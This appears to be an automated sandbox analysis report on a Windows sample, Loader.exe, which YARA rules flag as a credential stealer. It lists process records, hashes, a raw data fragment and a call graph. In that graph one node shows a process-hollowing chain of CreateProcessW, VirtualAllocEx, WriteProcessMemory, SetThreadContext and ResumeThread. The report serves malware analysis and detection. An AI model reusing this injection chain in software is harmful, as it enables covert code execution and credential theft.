                                                                                                              2024-12-31 16:42:41 UTC1369INData Raw: 6c 56 31 42 5a 6a 32 47 69 56 68 41 46 77 79 39 4f 2f 49 4a 35 73 39 4c 56 6d 53 72 59 58 58 63 71 66 65 48 71 42 4f 2b 2f 37 55 68 4d 49 55 37 73 47 37 39 6b 45 41 48 64 5a 52 69 74 67 68 6a 74 73 76 53 42 46 4f 59 37 63 67 73 4c 36 38 46 79 35 59 66 42 57 47 67 37 4c 2f 74 34 70 51 4e 49 47 63 42 7a 5a 74 6d 42 53 2f 2f 6f 2f 65 45 55 34 6e 77 55 45 6c 48 31 30 68 2f 31 6e 74 64 5a 4c 6a 70 34 33 48 32 54 61 44 30 35 75 48 35 2f 39 4b 4a 36 72 4f 54 64 79 33 4c 47 53 58 64 50 66 75 79 39 52 64 2b 67 2f 56 6c 6f 57 31 6e 54 59 65 4d 61 41 79 54 71 48 57 62 39 68 42 61 64 7a 74 54 79 4b 4a 70 77 4e 69 5a 51 31 4f 6b 4a 36 4c 62 55 55 31 6c 61 51 65 5a 74 6e 58 77 31 59 2b 4a 68 61 74 53 38 66 72 72 73 39 2f 38 67 6e 6b 35 79 45 6e 4c 30 2f 58 79 74 73 74
                                                                                                              Data Ascii: lV1BZj2GiVhAFwy9O/IJ5s9LVmSrYXXcqfeHqBO+/7UhMIU7sG79kEAHdZRitghjtsvSBFOY7cgsL68Fy5YfBWGg7L/t4pQNIGcBzZtmBS//o/eEU4nwUElH10h/1ntdZLjp43H2TaD05uH5/9KJ6rOTdy3LGSXdPfuy9Rd+g/VloW1nTYeMaAyTqHWb9hBadztTyKJpwNiZQ1OkJ6LbUU1laQeZtnXw1Y+JhatS8frrs9/8gnk5yEnL0/Xytst


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:11:42:25
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Users\user\Desktop\Loader.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                              Imagebase:0xcc0000
                                                                                                              File size:816'640 bytes
                                                                                                              MD5 hash:287009EDB0CE8E161D3A6328864FCF30
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:11:42:26
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7eb660000
                                                                                                              File size:875'008 bytes
                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:11:42:26
                                                                                                              Start date:31/12/2024
                                                                                                              Path:C:\Users\user\Desktop\Loader.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                              Imagebase:0xcc0000
                                                                                                              File size:816'640 bytes
                                                                                                              MD5 hash:287009EDB0CE8E161D3A6328864FCF30
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91105435551.000000000340D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91127781720.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91105517341.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91780179524.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.96103081032.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91118614146.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91105992992.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.91778616538.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.1%
                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                Signature Coverage:1.1%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:32
                                                                                                                execution_graph 18672 cc70f0 18677 cc8e7d 18672->18677 18674 cc7103 18681 cc7294 18674->18681 18678 cc8e89 18677->18678 18684 cc8da7 18678->18684 18680 cc8edb 18680->18674 18749 cc72a9 18681->18749 18693 cc7f7f 18684->18693 18686 cc8db2 18701 cc6c10 18686->18701 18688 cc8dc5 18689 cc4e30 39 API calls 18688->18689 18691 cc8ddf 18688->18691 18689->18691 18690 cc8deb 18690->18680 18691->18690 18705 cc9dcd 18691->18705 18694 cc7f8b 18693->18694 18695 cc4e30 39 API calls 18694->18695 18696 cc7fbc 18695->18696 18697 cc7153 3 API calls 18696->18697 18698 cc7fc3 18697->18698 18700 cc7fd4 18698->18700 18710 cc77f2 18698->18710 18700->18686 18702 cc6c57 18701->18702 18703 cc31c0 77 API calls 18702->18703 18704 cc6c6d 18703->18704 18704->18688 18706 cc74e4 7 API calls 18705->18706 18707 cc9ddb 18706->18707 18708 cc7515 2 API calls 18707->18708 18709 cc9e16 18708->18709 18709->18690 18711 cc77fe 18710->18711 18712 cc74e4 7 API calls 18711->18712 18713 cc7809 18712->18713 18721 cc783a 18713->18721 18722 cc76ef 18713->18722 18715 cc7515 2 API calls 18717 cc7877 18715->18717 18716 cc781c 18728 cc7885 18716->18728 18717->18700 18721->18715 18723 cc7153 3 API calls 18722->18723 18724 cc76fa 18723->18724 18725 cc770e 18724->18725 18736 cc7783 18724->18736 18725->18716 18729 cc7891 18728->18729 18730 cc7824 18728->18730 18739 cc9c74 18729->18739 18732 cc7670 18730->18732 18733 cc767e 18732->18733 18735 cc768a 18732->18735 18734 cd2a5e 14 API calls 18733->18734 18733->18735 18734->18735 18735->18721 18737 cc7670 14 API calls 18736->18737 18738 cc770c 18737->18738 18738->18716 18740 cc9c84 EncodePointer 18739->18740 18741 cd1f83 18739->18741 18740->18730 18740->18741 18742 cd7ae0 2 API calls 18741->18742 18743 cd7b07 48 API calls 18741->18743 18744 cd1f9d IsProcessorFeaturePresent 18741->18744 18745 ccf18f 21 API calls 18741->18745 18746 cd1a60 8 API calls 18741->18746 18747 cd446d 23 API calls 18741->18747 18748 cd446c 18741->18748 18742->18741 18743->18741 18744->18741 18745->18741 18746->18741 18747->18741 18748->18730 18750 cc72bf 18749->18750 18751 cc72b8 18749->18751 18758 cd0ffb 18750->18758 18755 cd106c 18751->18755 18754 cc710d 18756 cd0ffb 32 API calls 18755->18756 18757 cd107e 18756->18757 18757->18754 18761 cd125e 18758->18761 18762 cd126a 18761->18762 18769 cd1d11 EnterCriticalSection 18762->18769 18764 cd1278 18770 cd1082 18764->18770 18766 cd1285 18780 cd12ad 18766->18780 18769->18764 18771 cd109d 18770->18771 18779 cd1110 18770->18779 18772 cd10f0 18771->18772 18773 cdc065 32 API calls 18771->18773 18771->18779 18774 cdc065 32 API calls 18772->18774 18772->18779 18775 cd10e6 18773->18775 18776 cd1106 18774->18776 18777 cd56b7 14 API calls 18775->18777 18778 cd56b7 14 API calls 18776->18778 18777->18772 18778->18779 18779->18766 18783 cd1d28 LeaveCriticalSection 18780->18783 18782 cd102c 18782->18754 18783->18782 20276 cc51f0 20277 cc520f 20276->20277 20278 cc5237 20276->20278 20282 cc5390 20277->20282 20286 cc5440 20278->20286 20281 cc522f 20283 cc53da 20282->20283 20290 cc5530 20283->20290 20287 cc5487 20286->20287 20288 cc5530 30 API calls 20287->20288 20289 cc54bc 20288->20289 20289->20281 20303 cc5730 20290->20303 20294 cc556f 20295 cc5730 5 API calls 20294->20295 20300 cc55a8 20294->20300 20296 cc5602 20295->20296 20310 cc5850 20296->20310 20301 cc71d1 5 API calls 20300->20301 20302 cc53f9 20301->20302 20302->20281 20304 cc574b 20303->20304 20305 cc71d1 5 API calls 20304->20305 20306 cc555d 20305->20306 20306->20294 20307 cc57b0 20306->20307 20317 cc7974 20307->20317 20311 cc587e 20310->20311 20312 cc71d1 5 API calls 20311->20312 20313 cc5619 20312->20313 20314 cc58f0 20313->20314 20331 cc5990 20314->20331 20322 cc7a0d 20317->20322 20320 cca45c RaiseException 20321 cc7993 20320->20321 20325 cc67c0 20322->20325 20326 cc6801 20325->20326 20327 ccaa5d 29 API calls 20326->20327 20328 cc6820 20327->20328 20329 cc71d1 5 API calls 20328->20329 20330 cc682a 20329->20330 20330->20320 20334 cc59b0 20331->20334 20335 cc59c7 20334->20335 20338 cc2b20 20335->20338 20339 cc2b3f 20338->20339 20344 cc2b33 20338->20344 20340 cc2b4c 20339->20340 20341 cc2b5f 20339->20341 20345 cc2bc0 20340->20345 20353 cc2c30 20341->20353 20344->20300 20346 cc2bde 20345->20346 20347 cc2be3 20345->20347 20356 cc2c50 20346->20356 20349 cc2c30 3 API calls 20347->20349 20350 cc2bee 20349->20350 20352 cc2bfb 20350->20352 20360 cd1a0f 20350->20360 20352->20344 20354 cc7153 3 API calls 20353->20354 20355 cc2c42 20354->20355 20355->20344 20357 cc2c68 20356->20357 20358 cca45c RaiseException 20357->20358 20359 cc2c7d 20358->20359 20361 cd1c4e 29 API calls 20360->20361 20362 cd1a1e 20361->20362 20363 cd1a2c 11 API calls 20362->20363 20364 cd1a2b 20363->20364 18801 cc8af0 18802 cc8aff 18801->18802 18804 cc8b23 18802->18804 18805 cd304b 18802->18805 18806 cd305e 18805->18806 18809 cd30b8 18806->18809 18808 cd3073 18808->18804 18810 cd30ca 18809->18810 18813 cd30ed 18809->18813 18811 cd1ba8 29 API calls 18810->18811 18812 cd30e5 18811->18812 18812->18808 18813->18810 18814 cd3114 18813->18814 18817 cd31ee 18814->18817 18818 cd31fa 18817->18818 18825 ccd13f EnterCriticalSection 18818->18825 18820 cd3208 18826 cd314e 18820->18826 18822 cd3215 18835 cd323d 18822->18835 18825->18820 18827 cd21e8 73 API calls 18826->18827 18828 cd3169 18827->18828 18838 cd7f9d 18828->18838 18831 cd69f4 14 API calls 18832 cd31b2 18831->18832 18833 cd56b7 14 API calls 18832->18833 18834 cd318e 18833->18834 18834->18822 18842 ccd153 LeaveCriticalSection 18835->18842 18837 cd314c 18837->18808 18839 cd3173 18838->18839 18840 cd7fb4 18838->18840 18839->18831 18839->18834 18840->18839 18841 cd56b7 14 API calls 18840->18841 18841->18839 18842->18837 20378 cd5bf0 20379 cd5c0b 20378->20379 20380 cd5bfb 20378->20380 20384 cd5cf5 20380->20384 20383 cd56b7 14 API calls 20383->20379 20385 cd5d0a 20384->20385 20386 cd5d10 20384->20386 20387 cd56b7 14 API calls 20385->20387 20388 cd56b7 14 API calls 20386->20388 20387->20386 20389 cd5d1c 20388->20389 20390 cd56b7 14 API calls 20389->20390 20391 cd5d27 20390->20391 20392 cd56b7 14 API calls 20391->20392 20393 cd5d32 20392->20393 20394 cd56b7 14 API calls 20393->20394 20395 cd5d3d 20394->20395 20396 cd56b7 14 API calls 20395->20396 20397 cd5d48 20396->20397 20398 cd56b7 14 API calls 20397->20398 20399 cd5d53 20398->20399 20400 cd56b7 14 API calls 20399->20400 20401 cd5d5e 20400->20401 20402 cd56b7 14 API calls 20401->20402 20403 cd5d69 20402->20403 20404 cd56b7 14 API calls 20403->20404 20405 cd5d77 20404->20405 20410 cd5e6e 20405->20410 20411 cd5e7a 20410->20411 20426 cd1d11 EnterCriticalSection 20411->20426 20413 cd5e84 20416 cd56b7 14 API calls 20413->20416 20417 cd5eae 20413->20417 20416->20417 20427 cd5ecd 20417->20427 20418 cd5ed9 20419 cd5ee5 20418->20419 20431 cd1d11 EnterCriticalSection 20419->20431 20421 cd5eef 20422 cd5c11 14 API calls 20421->20422 20423 cd5f02 20422->20423 20432 cd5f22 20423->20432 20426->20413 20430 cd1d28 LeaveCriticalSection 20427->20430 20429 cd5d9d 20429->20418 20430->20429 20431->20421 20435 cd1d28 LeaveCriticalSection 20432->20435 20434 cd5c03 20434->20383 20435->20434 16706 cca28d 16715 cc9a20 GetModuleHandleW 16706->16715 16709 cca299 16713 cca2a4 16709->16713 16717 ccf1b4 16709->16717 16710 cca2cb 16720 ccf18f 16710->16720 16716 cc9a2c 16715->16716 16716->16709 16716->16710 16723 ccf2c4 16717->16723 16721 ccf2c4 21 API calls 16720->16721 16722 cca2d3 16721->16722 16724 ccf2f1 16723->16724 16725 ccf303 16723->16725 16726 cc9a20 GetModuleHandleW 16724->16726 16741 ccf45e 16725->16741 16728 ccf2f6 16726->16728 16728->16725 16735 ccf1f8 GetModuleHandleExW 16728->16735 16730 ccf1bf 16730->16713 16736 ccf258 16735->16736 16737 ccf237 GetProcAddress 16735->16737 16738 ccf25e FreeLibrary 16736->16738 16739 ccf267 16736->16739 16737->16736 16740 ccf24b 16737->16740 16738->16739 16739->16725 16740->16736 16742 ccf46a 16741->16742 16756 cd1d11 EnterCriticalSection 16742->16756 16744 ccf474 16757 ccf35b 16744->16757 16746 ccf481 16761 ccf49f 16746->16761 16749 ccf293 16818 ccf27a 16749->16818 16751 ccf29d 16752 ccf2b1 16751->16752 16753 ccf2a1 GetCurrentProcess TerminateProcess 16751->16753 16754 ccf1f8 3 API calls 16752->16754 16753->16752 16755 ccf2b9 ExitProcess 16754->16755 16756->16744 16759 ccf367 16757->16759 16758 ccf3cb 16758->16746 16759->16758 16764 cd102e 16759->16764 16817 cd1d28 LeaveCriticalSection 16761->16817 16763 ccf33a 16763->16730 16763->16749 16765 cd103a 16764->16765 16768 cd12b9 16765->16768 16767 cd1061 16767->16758 16769 cd12c5 16768->16769 16776 cd1d11 EnterCriticalSection 16769->16776 16771 cd12d3 16777 cd1184 16771->16777 16776->16771 16778 cd11a3 16777->16778 16779 cd119b 16777->16779 16778->16779 16784 cd56b7 16778->16784 16781 cd1308 16779->16781 16816 cd1d28 LeaveCriticalSection 16781->16816 16783 cd12f1 16783->16767 16785 cd56ec 16784->16785 16786 cd56c2 RtlFreeHeap 16784->16786 16785->16779 16786->16785 16787 cd56d7 GetLastError 16786->16787 16788 cd56e4 16787->16788 16790 cd1314 16788->16790 16793 cd5a9b GetLastError 16790->16793 16792 cd1319 16792->16785 16794 cd5ab1 16793->16794 16797 cd5ab7 16793->16797 16796 cd6374 6 API calls 16794->16796 16795 cd63b3 6 API calls 16798 cd5ad3 16795->16798 16796->16797 16797->16795 16813 cd5abb SetLastError 16797->16813 16800 cd69f4 12 API calls 16798->16800 16798->16813 16801 cd5ae8 16800->16801 16802 cd5b01 16801->16802 16803 cd5af0 16801->16803 16805 cd63b3 6 API calls 16802->16805 16804 cd63b3 6 API calls 16803->16804 16806 cd5afe 16804->16806 16807 cd5b0d 16805->16807 16810 cd56b7 12 API calls 16806->16810 16808 cd5b28 16807->16808 16809 cd5b11 16807->16809 16811 cd5c5c 12 API calls 16808->16811 16812 cd63b3 6 API calls 16809->16812 16810->16813 16814 cd5b33 16811->16814 16812->16806 16813->16792 16815 cd56b7 12 API calls 16814->16815 16815->16813 16816->16783 16817->16763 16821 cd8f4a 16818->16821 16820 ccf27f 16820->16751 16822 cd8f59 16821->16822 16823 cd8f66 16822->16823 16825 cd65c0 16822->16825 16823->16820 16828 cd670d 16825->16828 16829 cd673d 16828->16829 16830 cd65dc 16828->16830 16829->16830 16835 cd6642 16829->16835 16830->16823 16833 cd6757 GetProcAddress 16833->16830 16834 cd6767 16833->16834 16834->16830 16841 cd6653 16835->16841 16836 cd66e9 16836->16830 16836->16833 16837 cd6671 LoadLibraryExW 16838 cd668c GetLastError 16837->16838 16839 cd66f0 16837->16839 16838->16841 16839->16836 16840 cd6702 FreeLibrary 16839->16840 16840->16836 16841->16836 16841->16837 16842 cd66bf LoadLibraryExW 16841->16842 16842->16839 16842->16841 16843 cf019e 16847 cf01d4 16843->16847 16844 cf0321 GetPEB 16845 cf0333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 16844->16845 16846 cf03da WriteProcessMemory 16845->16846 16845->16847 16848 cf041f 16846->16848 16847->16844 16847->16845 16849 cf0424 WriteProcessMemory 16848->16849 16850 cf0461 WriteProcessMemory Wow64SetThreadContext ResumeThread 16848->16850 16849->16848 20559 cc8990 20560 cc89a4 20559->20560 20561 cc8bf5 78 API calls 20560->20561 20566 cc89ff 20560->20566 20562 cc89cf 20561->20562 20563 cc89ec 20562->20563 20564 cd13c4 76 API calls 20562->20564 20562->20566 20563->20566 20567 cd25ea 20563->20567 20564->20563 20568 cd260a 20567->20568 20569 cd25f5 20567->20569 20571 cd2627 20568->20571 20572 cd2612 20568->20572 20570 cd1314 14 API calls 20569->20570 20573 cd25fa 20570->20573 20581 cdc336 20571->20581 20574 cd1314 14 API calls 20572->20574 20576 cd19ff 29 API calls 20573->20576 20577 cd2617 20574->20577 20579 cd2605 20576->20579 20580 cd19ff 29 API calls 20577->20580 20578 cd2622 20578->20566 20579->20566 20580->20578 20582 cdc34a 20581->20582 20585 cdc8df 20582->20585 20584 cdc356 20584->20578 20586 cdc8eb 20585->20586 20587 cdc915 20586->20587 20588 cdc8f2 20586->20588 20596 ccd13f EnterCriticalSection 20587->20596 20589 cd1ba8 29 API calls 20588->20589 20591 cdc90b 20589->20591 20591->20584 20592 cdc923 20597 cdc73e 20592->20597 20594 cdc932 20610 cdc964 20594->20610 20596->20592 20598 cdc74d 20597->20598 20599 cdc775 20597->20599 20600 cd1ba8 29 API calls 20598->20600 20601 cd8e44 29 API calls 20599->20601 20602 cdc768 20600->20602 20603 cdc77e 20601->20603 20602->20594 20604 cdc170 33 API calls 20603->20604 20605 cdc79c 20604->20605 20605->20602 20606 cdc828 20605->20606 20608 cdc83f 20605->20608 20607 cdc3c8 34 API calls 20606->20607 20607->20602 20608->20602 20609 cdc573 33 API calls 20608->20609 20609->20602 20613 ccd153 LeaveCriticalSection 20610->20613 20612 cdc96c 20612->20591 20613->20612 19272 cc86a0 19273 cc86bb 19272->19273 19275 cc86cd 19273->19275 19276 cc8091 19273->19276 19279 cd3a8e 19276->19279 19280 cd3a9a 19279->19280 19281 cd3ab8 19280->19281 19282 cd3aa1 19280->19282 19292 ccd13f EnterCriticalSection 19281->19292 19283 cd1314 14 API calls 19282->19283 19285 cd3aa6 19283->19285 19287 cd19ff 29 API calls 19285->19287 19286 cd3ac7 19293 cd3b0c 19286->19293 19289 cc80a3 19287->19289 19289->19275 19290 cd3ad5 19307 cd3b04 19290->19307 19292->19286 19294 cd3b22 19293->19294 19300 cd3bac 19293->19300 19295 cd3b50 19294->19295 19294->19300 19310 cdf40f 19294->19310 19297 cd8e44 29 API calls 19295->19297 19295->19300 19298 cd3b62 19297->19298 19299 cd3b85 19298->19299 19301 cd8e44 29 API calls 19298->19301 19299->19300 19315 cd3bc2 19299->19315 19300->19290 19302 cd3b6e 19301->19302 19302->19299 19304 cd8e44 29 API calls 19302->19304 19305 cd3b7a 19304->19305 19306 cd8e44 29 API calls 19305->19306 19306->19299 19342 ccd153 LeaveCriticalSection 19307->19342 19309 cd3b0a 19309->19289 19311 cd69f4 14 API calls 19310->19311 19312 cdf42c 19311->19312 19313 cd56b7 14 API calls 19312->19313 19314 cdf436 19313->19314 19314->19295 19316 cd8e44 29 API calls 19315->19316 19317 cd3be5 19316->19317 19318 cd8e44 29 API calls 19317->19318 19319 cd3c0e 19317->19319 19320 cd3bf3 19318->19320 19324 cd3c48 19319->19324 19328 cd8b36 19319->19328 19320->19319 19322 cd8e44 29 API calls 19320->19322 19323 cd3c01 19322->19323 19325 cd8e44 29 API calls 19323->19325 19326 cc71d1 5 API calls 19324->19326 19325->19319 19327 cd3cc6 19326->19327 19327->19300 19329 cd8b49 19328->19329 19332 cd8b70 19329->19332 19331 cd8b5e 19331->19324 19334 cd8b85 19332->19334 19333 cd8bc6 19337 cd5801 WideCharToMultiByte 19333->19337 19340 cd8b89 19333->19340 19341 cd8bb2 19333->19341 19334->19333 19335 ccd5c0 48 API calls 19334->19335 19334->19340 19334->19341 19335->19333 19336 cd1ba8 29 API calls 19336->19340 19338 cd8c81 19337->19338 19339 cd8c97 GetLastError 19338->19339 19338->19340 19339->19340 19339->19341 19340->19331 19341->19336 19341->19340 19342->19309 20715 cc87a0 20716 cc87ac 20715->20716 20719 cc87fe 20716->20719 20720 cc8818 20716->20720 20723 cc87c6 20716->20723 20731 cc804d 20719->20731 20734 cd248a 20720->20734 20758 cc9dbe 20723->20758 20725 cc6840 29 API calls 20725->20723 20726 cc88d4 20726->20725 20728 cd248a 45 API calls 20729 cc8837 20728->20729 20729->20726 20729->20728 20730 cc890e 20729->20730 20754 cc7b8b 20729->20754 20730->20726 20761 cd3927 20730->20761 20774 cd2645 20731->20774 20735 cd2496 20734->20735 20736 cd24b8 20735->20736 20737 cd24a0 20735->20737 21037 ccd13f EnterCriticalSection 20736->21037 20738 cd1314 14 API calls 20737->20738 20740 cd24a5 20738->20740 20742 cd19ff 29 API calls 20740->20742 20741 cd24c3 20743 cd8e44 29 API calls 20741->20743 20746 cd24db 20741->20746 20753 cd24b0 20742->20753 20743->20746 20744 cd256b 21038 cd25a3 20744->21038 20745 cd2543 20747 cd1314 14 API calls 20745->20747 20746->20744 20746->20745 20749 cd2548 20747->20749 20751 cd19ff 29 API calls 20749->20751 20750 cd2571 21048 cd259b 20750->21048 20751->20753 20753->20729 20755 cc7bbf 20754->20755 20757 cc7b9b 20754->20757 21052 cc902f 20755->21052 20757->20729 20759 cc71d1 5 API calls 20758->20759 20760 cc9dc8 20759->20760 20760->20760 20762 cd3933 20761->20762 20763 cd394f 20762->20763 20764 cd393a 20762->20764 21063 ccd13f EnterCriticalSection 20763->21063 20765 cd1314 14 API calls 20764->20765 20767 cd393f 20765->20767 20770 cd19ff 29 API calls 20767->20770 20768 cd3959 21064 cd399a 20768->21064 20772 cd394a 20770->20772 20772->20730 20775 cd2651 20774->20775 20776 cd266f 20775->20776 20777 cd2658 20775->20777 20787 ccd13f EnterCriticalSection 20776->20787 20778 cd1314 14 API calls 20777->20778 20780 cd265d 20778->20780 20782 cd19ff 29 API calls 20780->20782 20781 cd267b 20788 cd26bc 20781->20788 20784 cc8058 20782->20784 20784->20723 20787->20781 20789 cd273f 20788->20789 20790 cd26d9 20788->20790 20792 cd2806 20789->20792 20794 cd8e44 29 API calls 20789->20794 20791 cd8e44 29 API calls 20790->20791 20793 cd26df 20791->20793 20824 cd2686 20792->20824 20843 cdde7e 20792->20843 20795 cd2702 20793->20795 20798 cd8e44 29 API calls 20793->20798 20796 cd2754 20794->20796 20795->20789 20808 cd271d 20795->20808 20799 cd2777 20796->20799 20802 cd8e44 29 API calls 20796->20802 20801 cd26eb 20798->20801 20799->20792 20800 cd278e 20799->20800 20803 cd25df 43 API calls 20800->20803 20801->20795 20807 cd8e44 29 API calls 20801->20807 20804 cd2760 20802->20804 20806 cd2797 20803->20806 20804->20799 20810 cd8e44 29 API calls 20804->20810 20811 ccd2bf 48 API calls 20806->20811 20806->20824 20809 cd26f7 20807->20809 20808->20824 20828 cd25df 20808->20828 20812 cd8e44 29 API calls 20809->20812 20813 cd276c 20810->20813 20815 cd27af 20811->20815 20812->20795 20814 cd8e44 29 API calls 20813->20814 20814->20799 20816 cd27d9 20815->20816 20818 cd25df 43 API calls 20815->20818 20839 cd8cda 20816->20839 20820 cd27c0 20818->20820 20819 cd27ed 20822 cd1314 14 API calls 20819->20822 20819->20824 20820->20816 20821 cd27c6 20820->20821 20823 cd3927 31 API calls 20821->20823 20822->20824 20823->20824 20825 cd26b4 20824->20825 21036 ccd153 LeaveCriticalSection 20825->21036 20827 cd26ba 20827->20784 20829 cd25a3 20828->20829 20830 cd25af 20829->20830 20831 cd25c4 20829->20831 20832 cd1314 14 API calls 20830->20832 20833 cd25d3 20831->20833 20864 cdde73 20831->20864 20834 cd25b4 20832->20834 20833->20808 20836 cd19ff 29 API calls 20834->20836 20838 cd25bf 20836->20838 20838->20808 20840 cd8ced 20839->20840 21017 cd8d11 20840->21017 20842 cd8cff 20842->20819 20844 cde018 20843->20844 20845 cde027 20844->20845 20848 cde03c 20844->20848 20846 cd1314 14 API calls 20845->20846 20847 cde02c 20846->20847 20849 cd19ff 29 API calls 20847->20849 20850 cde09a 20848->20850 20851 cdf40f 14 API calls 20848->20851 20857 cde037 20848->20857 20849->20857 20852 cd8e44 29 API calls 20850->20852 20851->20850 20853 cde0ca 20852->20853 20854 ce2d83 43 API calls 20853->20854 20855 cde0d2 20854->20855 20856 cd8e44 29 API calls 20855->20856 20855->20857 20858 cde10c 20856->20858 20857->20824 20858->20857 20859 cd8e44 29 API calls 20858->20859 20860 cde11a 20859->20860 20860->20857 20861 cd8e44 29 API calls 20860->20861 20862 cde128 20861->20862 20863 cd8e44 29 API calls 20862->20863 20863->20857 20865 cdde89 20864->20865 20866 cdde96 20865->20866 20869 cddeae 20865->20869 20867 cd1314 14 API calls 20866->20867 20868 cdde9b 20867->20868 20870 cd19ff 29 API calls 20868->20870 20871 cddf0d 20869->20871 20872 cdf40f 14 API calls 20869->20872 20878 cd25d0 20869->20878 20870->20878 20873 cd8e44 29 API calls 20871->20873 20872->20871 20874 cddf26 20873->20874 20885 ce2d83 20874->20885 20877 cd8e44 29 API calls 20879 cddf5f 20877->20879 20878->20808 20879->20878 20880 cd8e44 29 API calls 20879->20880 20881 cddf6d 20880->20881 20881->20878 20882 cd8e44 29 API calls 20881->20882 20883 cddf7b 20882->20883 20884 cd8e44 29 API calls 20883->20884 20884->20878 20886 ce2d8f 20885->20886 20887 ce2d97 20886->20887 20892 ce2db2 20886->20892 20888 cd1327 14 API calls 20887->20888 20889 ce2d9c 20888->20889 20890 cd1314 14 API calls 20889->20890 20893 cddf2e 20890->20893 20891 ce2dc9 20895 cd1327 14 API calls 20891->20895 20892->20891 20894 ce2e04 20892->20894 20893->20877 20893->20878 20896 ce2e0d 20894->20896 20897 ce2e22 20894->20897 20898 ce2dce 20895->20898 20900 cd1327 14 API calls 20896->20900 20915 cdd018 EnterCriticalSection 20897->20915 20899 cd1314 14 API calls 20898->20899 20902 ce2dd6 20899->20902 20903 ce2e12 20900->20903 20909 cd19ff 29 API calls 20902->20909 20905 cd1314 14 API calls 20903->20905 20904 ce2e28 20906 ce2e5c 20904->20906 20907 ce2e47 20904->20907 20905->20902 20916 ce2e9c 20906->20916 20908 cd1314 14 API calls 20907->20908 20911 ce2e4c 20908->20911 20909->20893 20913 cd1327 14 API calls 20911->20913 20912 ce2e57 20979 ce2e94 20912->20979 20913->20912 20915->20904 20917 ce2eae 20916->20917 20918 ce2ec6 20916->20918 20920 cd1327 14 API calls 20917->20920 20919 ce3208 20918->20919 20924 ce2f09 20918->20924 20922 cd1327 14 API calls 20919->20922 20921 ce2eb3 20920->20921 20925 cd1314 14 API calls 20921->20925 20923 ce320d 20922->20923 20927 cd1314 14 API calls 20923->20927 20926 ce2ebb 20924->20926 20928 ce2f14 20924->20928 20934 ce2f44 20924->20934 20925->20926 20926->20912 20929 ce2f21 20927->20929 20930 cd1327 14 API calls 20928->20930 20932 cd19ff 29 API calls 20929->20932 20931 ce2f19 20930->20931 20933 cd1314 14 API calls 20931->20933 20932->20926 20933->20929 20935 ce2f5d 20934->20935 20936 ce2f6a 20934->20936 20937 ce2f98 20934->20937 20935->20936 20970 ce2f86 20935->20970 20938 cd1327 14 API calls 20936->20938 20940 cd56f1 15 API calls 20937->20940 20939 ce2f6f 20938->20939 20941 cd1314 14 API calls 20939->20941 20943 ce2fa9 20940->20943 20944 ce2f76 20941->20944 20946 cd56b7 14 API calls 20943->20946 20947 cd19ff 29 API calls 20944->20947 20945 ce30e4 20948 ce3158 20945->20948 20952 ce30fd GetConsoleMode 20945->20952 20949 ce2fb2 20946->20949 20978 ce2f81 20947->20978 20951 ce315c ReadFile 20948->20951 20950 cd56b7 14 API calls 20949->20950 20953 ce2fb9 20950->20953 20954 ce3174 20951->20954 20955 ce31d0 GetLastError 20951->20955 20952->20948 20956 ce310e 20952->20956 20957 ce2fde 20953->20957 20958 ce2fc3 20953->20958 20954->20955 20961 ce314d 20954->20961 20959 ce31dd 20955->20959 20960 ce3134 20955->20960 20956->20951 20962 ce3114 ReadConsoleW 20956->20962 20966 cdc112 31 API calls 20957->20966 20964 cd1314 14 API calls 20958->20964 20965 cd1314 14 API calls 20959->20965 20971 cd133a 14 API calls 20960->20971 20960->20978 20974 ce3199 20961->20974 20975 ce31b0 20961->20975 20961->20978 20962->20961 20967 ce312e GetLastError 